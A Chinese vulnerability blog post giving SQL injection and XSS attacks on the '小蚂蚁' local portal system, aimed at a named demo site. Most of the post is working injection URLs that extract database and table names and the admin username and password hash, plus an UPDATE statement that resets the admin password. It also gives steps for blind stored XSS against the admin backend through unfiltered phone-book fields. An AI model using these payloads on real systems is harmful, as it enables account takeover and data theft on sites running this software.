小蚂蚁地方门户系统sql注入与XSS

  • A+
所属分类:漏洞时代
摘要

1.SQL注入:
[php]
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a’and%20db_name()%3E0–

1.SQL注入:
[php]
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and%20db_name()%3E0--

demo_xiaomayi_co
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 name from demo_xiaomayi_co.dbo.sysobjects where xtype=CHAR(85))>0--

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 username from Ant_admin)>0-- 出帐号

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 password from Ant_admin)>0-- 出密码散列

替换密码
paLhASC5WX1ZUvaBeDN+lQ==,换好后,管理员admin密码就是weiwei0307

这个破鸟,发现是假的`真的需要你自己找办法..

update Ant_admin set password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR' where Username='用户名'--
[php]
2.xss
xss可盲打后台
首页前台的XSS在发布黄页的电话薄首先要注册一个会员,当然这些门户站点都会开放注册登录,注册好之后到发布黄页电话薄的地方。

URL:http://demo.xiaomayi.co/Life/phonebookadd.aspx?action=edit

这边的电话和手机后台都没过滤,不过前台有长度限制,抓包修改一下就OK了,然后提交

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: